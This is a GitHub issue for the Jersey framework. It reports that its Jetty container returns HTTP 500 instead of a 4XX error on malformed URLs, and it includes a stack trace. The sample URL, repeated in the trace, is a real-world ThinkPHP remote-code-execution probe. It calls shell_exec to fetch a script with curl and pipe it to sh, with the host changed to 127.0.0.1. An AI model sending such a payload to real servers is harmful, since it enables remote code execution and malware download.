Skip to content
New issue

Have a question about this project? # for a free GitHub account to open an issue and contact its maintainers and the community.

#

By clicking “#”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? # to your account

Jump to bottom

Exception in Jersey Jetty handler's URL parsing bubbles up to the top #4748

Closed
gredler opened this issue Mar 17, 2021 · 0 comments · Fixed by #4809
Closed

Exception in Jersey Jetty handler's URL parsing bubbles up to the top #4748

gredler opened this issue Mar 17, 2021 · 0 comments · Fixed by #4809
Milestone
2.35

Comments

@gredler
Copy link

gredler commented Mar 17, 2021

If you deploy a Jersey + Jetty service to the big, bad public internet the service will inevitably start to receive requests at paths containing special characters. In some cases, instead of responding with HTTP 4XX errors, the Jersey internals will generate HTTP 500 errors.

This bug seems similar to issue #2952 (originally JERSEY-2680), except that bug was in the servlet stack and this is in the Jetty stack.

Sample problematic URL (for a Jersey service running on localhost on port 8181, with a path observed in the wild as part of a likely security probe, though the remote IP has been changed to 127.0.0.1 just to be safe):

http://localhost:8181/v1/abcdefgh/abcde/abcdef/abc/a/%3Fs=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=curl+--user-agent+curl_tp5+http://127.0.0.1/ldr.sh|sh

Sample stack trace for the exception which is uncaught and triggers the HTTP 500 error response:

java.lang.IllegalArgumentException: java.net.URISyntaxException: Illegal character in path at index 65: http://localhost:8181/v1/abcdefgh/abcde/abcdef/abc/a/%3Fs=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=curl+--user-agent+curl_tp5+http://127.0.0.1/ldr.sh|sh
	at org.glassfish.jersey.jetty.JettyHttpContainer.getRequestUri(JettyHttpContainer.java:214)
	at org.glassfish.jersey.jetty.JettyHttpContainer.handle(JettyHttpContainer.java:169)
	at org.eclipse.jetty.server.handler.HandlerWrapper.handle(HandlerWrapper.java:97)
	at org.eclipse.jetty.server.handler.ResourceHandler.handle(ResourceHandler.java:439)
	at org.eclipse.jetty.security.SecurityHandler.handle(SecurityHandler.java:553)
	at org.eclipse.jetty.server.handler.HandlerWrapper.handle(HandlerWrapper.java:97)
	at org.eclipse.jetty.server.Server.handle(Server.java:499)
	at org.eclipse.jetty.server.HttpChannel.handle(HttpChannel.java:311)
	at org.eclipse.jetty.server.HttpConnection.onFillable(HttpConnection.java:257)
	at org.eclipse.jetty.io.AbstractConnection$2.run(AbstractConnection.java:544)
	at org.eclipse.jetty.util.thread.QueuedThreadPool.runJob(QueuedThreadPool.java:635)
	at org.eclipse.jetty.util.thread.QueuedThreadPool$3.run(QueuedThreadPool.java:555)
	at java.base/java.lang.Thread.run(Thread.java:834)
Caused by: java.net.URISyntaxException: Illegal character in path at index 65: http://localhost:8181/v1/abcdefgh/abcde/abcdef/abc/a/%3Fs=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=curl+--user-agent+curl_tp5+http://127.0.0.1/ldr.sh|sh
	at java.base/java.net.URI$Parser.fail(URI.java:2915)
	at java.base/java.net.URI$Parser.checkChars(URI.java:3086)
	at java.base/java.net.URI$Parser.parseHierarchical(URI.java:3168)
	at java.base/java.net.URI$Parser.parse(URI.java:3116)
	at java.base/java.net.URI.<init>(URI.java:600)
	at org.glassfish.jersey.jetty.JettyHttpContainer.getRequestUri(JettyHttpContainer.java:212)
	... 16 common frames omitted
@aserkes aserkes mentioned this issue Jun 14, 2021
Merged
@senivam senivam added this to the 2.35 milestone Jul 2, 2021
This was referenced Sep 6, 2021
Merged
Merged
Merged
Merged
Closed
Closed
Merged
Closed
Merged
Merged
Merged
Merged
Closed
Merged
Merged
Merged
Closed
Merged
Open
@renovate renovate bot mentioned this issue Sep 23, 2021
Merged
1 task
This was referenced Oct 4, 2021
Merged
Merged
This was referenced Oct 18, 2021
Open
Open
Open
Open
Merged
This was referenced Mar 8, 2022
Closed
Closed
Merged
@renovate renovate bot mentioned this issue Mar 15, 2022
Merged
1 task
@mend-for-github-com mend-for-github-com bot mentioned this issue Apr 17, 2022
Closed
@mend-for-github-com mend-for-github-com bot mentioned this issue May 3, 2022
Open
1 task
@renovate renovate bot mentioned this issue Jun 14, 2022
Closed
1 task
@renovate renovate bot mentioned this issue Sep 6, 2022
Closed
1 task
@renovate renovate bot mentioned this issue Sep 23, 2022
Merged
1 task
This was referenced Oct 19, 2022
Closed
Closed
@renovate renovate bot mentioned this issue Dec 22, 2022
Closed
1 task
This was referenced Jan 6, 2023
Merged
Closed
This was referenced Feb 11, 2023
Merged
Closed
@renovate renovate bot mentioned this issue Mar 23, 2023
Closed
1 task
@mend-for-github-com mend-for-github-com bot mentioned this issue Mar 26, 2023
Open
This was referenced May 11, 2023
Open
Open
This was referenced Jun 15, 2023
Merged
Merged
This was referenced Jul 6, 2023
Open
Open
@renovate renovate bot mentioned this issue Aug 30, 2023
Merged
1 task
@mend-for-github-com mend-for-github-com bot mentioned this issue Dec 4, 2023
Open
@mend-for-github-com mend-for-github-com bot mentioned this issue Jan 11, 2024
Open
This was referenced Apr 13, 2024
Merged
Closed
Closed
# for free to join this conversation on GitHub. Already have an account? # to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
2.35
Development

Successfully merging a pull request may close this issue.

handle URISyntaxException in JettyHttpContainer aserkes/jersey
2 participants
@gredler @senivam